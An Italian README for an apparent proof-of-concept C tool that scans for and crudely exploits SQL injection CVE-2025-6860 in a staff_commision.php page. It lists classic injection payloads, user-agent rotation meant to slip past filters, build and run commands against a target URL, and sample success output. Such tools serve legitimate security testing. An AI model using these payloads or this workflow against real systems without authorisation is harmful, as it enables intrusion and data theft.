
Uno strumento da riga di comando prova di concetto in C per rilevare la vulnerabilità SQL injection .
Uno strumento da riga di comando proof‑of‑concept in C per rilevare (e sfruttare rudimentalmente) la vulnerabilità di SQL injection CVE‑2025‑6860 in staff_commision.php (parametri fromdate e todate). Utilizza libcurl per le richieste HTTP, ruota attraverso payload e user‑agent comuni, analizza le risposte alla ricerca di pattern di errore SQL e produce output colorato a console tramite syscall.
Rotazione automatica dei payload
Prova una varietà di payload di SQL injection (' OR 1 -- -, admin' or '1'='1, -1 UNION SELECT 1, …) sia su fromdate che su todate.
Ciclo dinamico degli User‑Agent
Ruota attraverso un elenco di stringhe realistiche di UA dei browser per eludere semplici filtri.
HTTP tramite Libcurl
Segue i redirect, disabilita la verifica SSL (per test), intestazioni personalizzate.
Syscall di basso livello per I/O
Usa syscall(write) invece di printf() per messaggi colorati e tempestivi.
Analisi delle risposte
Scansiona le risposte del server alla ricerca di oltre 50 firme di errore SQL (MySQL, PostgreSQL, Oracle, MSSQL, OLE‑DB, ODBC, Hibernate, ecc.).
Output colorato ANSI
Messaggi chiari di successo/fallimento/informativi in verde, blu, rosso.
Su Debian/Ubuntu:
sudo apt update
sudo apt install -y build-essential libcurl4-openssl-dev
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u "http://target.com/panel/staff_commision.php?fromdate=&todate="
-u, --urlEsempio:
./exploit -u "http://vulnweb.com/panel/staff_commision.php?fromdate=&todate="
Se vulnerabile, vedrai:
[+] Exploitation of CVE-2025-6860 has begun...
[+] TARGET URL : http://…?fromdate=&todate=
[+] Request sent successfully!
[+] FULL URL : http://…?fromdate=' OR 1 -- -&todate=' OR 1 -- -
[+] HTTP CODE : 200
[+] A suspicious word was found in response!
[+] Keyword : You have an error in your SQL syntax
[+] The server suffers from a CVE-2025-6860 vulnerability!
In caso di fallimento, vengono segnalati pattern mancanti o errori HTTP.
├── exploit.c # Logica principale dell'exploit
├── argparse.c # Implementazione minimale di argparse
├── argparse.h # Header per argparse.c
├── README.md # Questa documentazione
└── LICENSE # File della licenza MIT
Disclaimer: Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai esplicito permesso di test. La scansione o lo sfruttamento non autorizzati sono illegali.